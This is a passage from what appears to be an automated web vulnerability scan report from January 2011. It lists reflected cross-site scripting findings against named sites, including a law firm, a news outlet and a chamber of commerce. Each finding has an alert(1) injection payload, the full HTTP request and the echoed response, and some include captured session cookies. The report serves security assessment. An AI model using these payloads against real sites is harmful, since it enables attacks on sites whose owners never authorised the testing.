Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:33:31 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1148; path=/
Set-Cookie: PortletId=1139501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 25101


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Pro Bono | Overview</title>
<meta name="langua
...[SNIP]...
cument.aspnetForm.action = '/probonooverview/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/probonooverview/ProBono.aspx?eb241'-alert(1)-'14889ea6214=1';//]]>
...[SNIP]...

4.93. http://www.cov.com/publications [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /publications

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37aa1'-alert(1)-'7b6396f21de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /publications?37aa1'-alert(1)-'7b6396f21de=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:37:38 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1159; path=/
Set-Cookie: PortletId=1150501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 158249


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Publications</title>
<meta name="language" con
...[SNIP]...
DATA[
document.aspnetForm.action = '/publications/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/publications/List.aspx?37aa1'-alert(1)-'7b6396f21de=1';//]]>
...[SNIP]...

4.94. http://www.cov.com/recruitingthebestandbrightest [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /recruitingthebestandbrightest

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c57c0'-alert(1)-'7612bb35499 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /recruitingthebestandbrightest?c57c0'-alert(1)-'7612bb35499=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:45:17 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1153; path=/
Set-Cookie: PortletId=1144501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 15778


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Diversity | Recruiting the Best & Brightest</title>
...[SNIP]...
ecruitingthebestandbrightest/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/recruitingthebestandbrightest/Diversity.aspx?c57c0'-alert(1)-'7612bb35499=1';//]]>
...[SNIP]...

4.95. http://www.cov.com/retainingourdiversetalent [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /retainingourdiversetalent

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c13f'-alert(1)-'a38ede21cf4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /retainingourdiversetalent?1c13f'-alert(1)-'a38ede21cf4=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:47:34 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1154; path=/
Set-Cookie: PortletId=1145501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17215


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Diversity | Retaining Our Diverse Talent</title>

...[SNIP]...
on = '/retainingourdiversetalent/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/retainingourdiversetalent/Diversity.aspx?1c13f'-alert(1)-'a38ede21cf4=1';//]]>
...[SNIP]...

4.96. http://www.cov.com/sitemap [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /sitemap

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6862'-alert(1)-'2791e98804b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sitemap?a6862'-alert(1)-'2791e98804b=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:33:06 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1163; path=/
Set-Cookie: PortletId=1154501; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 33131


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Site Map</title>
<meta name="language" content
...[SNIP]...
<![CDATA[
document.aspnetForm.action = '/sitemap/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/sitemap/Sitemap.aspx?a6862'-alert(1)-'2791e98804b=1';//]]>
...[SNIP]...

4.97. http://www.cov.com/termsofuse [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cov.com
Path:   /termsofuse

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce89f'-alert(1)-'5ebc528209d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /termsofuse?ce89f'-alert(1)-'5ebc528209d=1 HTTP/1.1
Host: www.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PortletId=0; SERVER_PORT=80; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; NSC_QPE-FHB3536-Tibsfe=ffffffff09d5f63d45525d5f4f58455e445a4a423660; DefaultCulture=en-US; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; ASP.NET_SessionId=42fhylvwx45ssx3bzxt2ly55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1086&RootPortletID=666&RootPortletH4AssetID=1034401&LicenseKey= &Name=Web Framework&URL=wc; SiteId=0;

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:42:38 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000338
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A35
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1389; path=/
Set-Cookie: PortletId=3588901; path=/
Set-Cookie: SiteId=1087; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28021


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title id="ctl00_htmlTitle">Covington &amp; Burling LLP | Terms of Use</title>
<meta name="language" con
...[SNIP]...
document.aspnetForm.action = '/termsofuse/' + document.aspnetForm.action;var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/termsofuse/GeneralPageData.aspx?ce89f'-alert(1)-'5ebc528209d=1';//]]>
...[SNIP]...

4.98. http://www.csmonitor.com/USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1edc1"-alert(1)-"8a5e635d48 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /USA1edc1"-alert(1)-"8a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Wed, 19 Jan 2011 15:47:57 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86400
Expires: Thu, 20 Jan 2011 15:47:57 GMT
Date: Wed, 19 Jan 2011 15:47:57 GMT
Content-Length: 22010
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--seo title-->

<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/USA1edc1"-alert(1)-"8a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

4.99. http://www.csmonitor.com/USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53b36"-alert(1)-"11f428f14f7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /USA/Justice53b36"-alert(1)-"11f428f14f7/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Wed, 19 Jan 2011 15:48:02 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86400
Expires: Thu, 20 Jan 2011 15:48:03 GMT
Date: Wed, 19 Jan 2011 15:48:03 GMT
Content-Length: 22012
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--seo title-->

<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/USA/Justice53b36"-alert(1)-"11f428f14f7/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

4.100. http://www.csmonitor.com/USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10b9d"-alert(1)-"77d9442451f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /USA/Justice/201110b9d"-alert(1)-"77d9442451f/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Wed, 19 Jan 2011 15:48:08 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86400
Expires: Thu, 20 Jan 2011 15:48:08 GMT
Date: Wed, 19 Jan 2011 15:48:08 GMT
Content-Length: 22012
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--seo title-->

<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/USA/Justice/201110b9d"-alert(1)-"77d9442451f/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

4.101. http://www.csmonitor.com/USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 133fa"-alert(1)-"9a2b6004857 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /USA/Justice/2011/0118133fa"-alert(1)-"9a2b6004857/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Wed, 19 Jan 2011 15:48:15 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86400
Expires: Thu, 20 Jan 2011 15:48:15 GMT
Date: Wed, 19 Jan 2011 15:48:15 GMT
Content-Length: 22012
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--seo title-->

<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/USA/Justice/2011/0118133fa"-alert(1)-"9a2b6004857/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

4.102. http://www.csmonitor.com/USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12fdc"-alert(1)-"b91d9019faa was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law12fdc"-alert(1)-"b91d9019faa HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Wed, 19 Jan 2011 15:48:20 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86367
Expires: Thu, 20 Jan 2011 15:47:47 GMT
Date: Wed, 19 Jan 2011 15:48:20 GMT
Content-Length: 22012
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--seo title-->

<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/USA/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law12fdc"-alert(1)-"b91d9019faa";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

4.103. http://www.dcchamber.org/chamber/memberDetail.asp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dcchamber.org
Path:   /chamber/memberDetail.asp

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d392"><script>alert(1)</script>ceb88aaba32 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /chamber6d392"><script>alert(1)</script>ceb88aaba32/memberDetail.asp HTTP/1.1
Host: www.dcchamber.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Wed, 19 Jan 2011 15:48:15 GMT
Server: Apache/2.0.63 (Red Hat)
Set-Cookie: PHPSESSID=0ilpmfogoftmdtsc2djk1fdtm3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html

